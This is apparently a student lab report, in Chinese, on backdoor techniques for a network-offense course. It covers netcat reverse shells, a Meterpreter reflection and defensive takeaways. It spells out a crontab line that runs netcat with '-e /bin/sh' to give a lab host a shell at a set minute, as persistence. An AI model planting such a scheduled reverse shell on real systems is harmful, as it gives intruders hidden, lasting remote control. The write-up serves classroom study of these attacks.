20145322何志威《网络对抗》Exp2 后门原理与实践
基础问题回答
1 例举你能想到的一个后门进入到你系统中的可能方式?
在网上下载盗版软件时捆绑的后门程序。
不小心进入钓鱼网站。
2 例举你知道的后门如何启动起来(win及linux)的方式?
Windows =中的任务计划、开机启动、和其他恶意软件捆绑启动。
对后门程序进行伪装,引诱用户点击启动(游戏)。
3 Meterpreter有哪些给你映像深刻的功能?
那必须是摄像头(虽然我的没成功,所以没写),但是其他人可以,那简直完胜一切偷摸的摄像头。
4 如何发现自己有系统有没有被安装后门?
其他方法我不知道,做实验的时候QQ安全管家没关,直接把我的后门删了,可以看出一般杀毒软件还是可以的。
实验总结与体会
自己一联网就感觉多少有点慌,平时真的很少打补丁,尤其做MSF那一块的时候,觉得被攻击太容易了,不过令我感到欣慰的还是QQ管家,直接帮我把后门给删了,说明现在的一些常见的杀毒软件还是很可靠的,最主要的还是平时要加强自己的安全意识,定期杀毒,多打补丁。对于这门课感觉兴趣更大了,毕竟自己动手效果很直接明了。
一、后门工具实践过程
1 使用 ipconfig 指令查看本机IP:
2 在 Windows 上使用 ncat.exe 程序监听5322端口:
3 在Kali上使用ncat.exe程序监听5322端口:
4 Windows 上成功获得Kali的shell:
二、Linux获得Windows Shell
1 获得 Kali 的IP:
2 在Kali上使用ncat.exe程序监听5322端口:
3 在Windows上,使用 ncat 程序中-e选项项反向连接Kali主机的5322端口:
4 通过Kali可以看到命令提示,并可以输入Windows的命令:
三、使用nc传输数据
1 Windows 下监听5322端口:
2 Kali下连接到Windows的5322端口:
3 连接成功,开始聊天!
四、使用 netcat 获取主机操作Shell,cron启动
1 在 Windows 上使用 ncat 程序监听5322端口:
2 使用man crontab指令查看crontab命令,可知其用来将标准输入设备中读取指令,然后存到crontab文件中以便之后再用
3 用 crontab -e指令编一条定时任务(本机默认是vim编辑器),并且最后一行添加50 * * * * /bin/netcat 172.20.10.14 5322 -e /bin/sh,让他在50分的时候显示:
49分的时候没显示
50分显示出来